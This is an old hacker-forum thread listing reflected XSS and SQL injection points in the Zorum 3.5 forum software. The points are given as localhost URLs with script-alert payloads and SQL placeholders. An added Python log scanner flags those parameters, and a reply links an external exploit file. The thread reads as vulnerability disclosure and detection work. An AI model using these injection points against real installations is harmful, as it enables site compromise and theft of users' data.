ANTICHAT Forum


_kREveDKo_ 15.04.2006 17:17

XSS (passive) & SQL-inj in Zorum 3.5

So I installed it locally, poked at it for a while, and found:

(if any of this is already public, my apologies, I didn't check...)


_http://localhost/zorum/index.php?method=userfunctions&list=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=showdetails&list=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=showhtmllist&list=topic&rollid=[_S_Q_L__H_E_R_E_]
_http://localhost/zorum/index.php?method=create_form&list=<script>alert("lol");</script>
_http://localhost/zorum/index.php?inf=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=login_form&list=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=remind_password_form&list=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=remind_password&list=zorumuser&fromlist=forum&frommethod=showhtmllist&email=[_S_Q_L__H_E_R_E_]&submit=Ok
_http://localhost/zorum/index.php?method=showattach&id=14[_S_Q_L__H_E_R_E_]
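
On the defensive side, the parameters listed in the post above can be watched for in web server access logs. The following is an added example, not part of the original post and not Zorum code: it flags requests to index.php where those parameters carry values outside an assumed shape (plain identifiers for method, list, inf, fromlist and frommethod; digits for rollid and id; an address for email). The log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expected value shape for each parameter named in the post above. The shapes
# are assumptions inferred from the benign values in those URLs
# (method=showhtmllist, list=topic, id=14), not taken from Zorum's source.
IDENT = re.compile(r"[A-Za-z0-9_]+")
NUMBER = re.compile(r"\d+")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
EXPECTED = {
    "method": IDENT, "list": IDENT, "inf": IDENT,
    "fromlist": IDENT, "frommethod": IDENT,
    "rollid": NUMBER, "id": NUMBER, "email": EMAIL,
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_line(line):
    """Return (param, decoded value) pairs whose value breaks the expected shape."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    # parse_qsl percent-decodes, so encoded markup or quotes are seen in clear.
    return [(name, value)
            for name, value in parse_qsl(url.query, keep_blank_values=True)
            if name in EXPECTED and not EXPECTED[name].fullmatch(value)]

def scan(lines):
    """Group suspicious (param, value) pairs by client address (first log field)."""
    report = {}
    for line in lines:
        hits = check_line(line)
        if hits:
            report.setdefault(line.split(" ", 1)[0], []).extend(hits)
    return report

# Constructed sample lines in combined log format, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Apr/2006:17:20:01 +0000] "GET /zorum/index.php?method=showdetails&list=%3Cscript%3Ealert(%22lol%22)%3B%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/Apr/2006:17:21:40 +0000] "GET /zorum/index.php?method=showattach&id=14%27 HTTP/1.1" 200 811',
    '192.0.2.44 - - [15/Apr/2006:17:22:05 +0000] "GET /zorum/index.php?method=showhtmllist&list=topic&rollid=3 HTTP/1.1" 200 9034',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

The same per-parameter shapes can serve as an input allowlist in front of the application, which is a stricter control than matching on `<script>` alone.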

+toxa+ 15.04.2006 17:28

4) I think there was a bug like that... __http://rst.void.ru/download/r57zor.txt

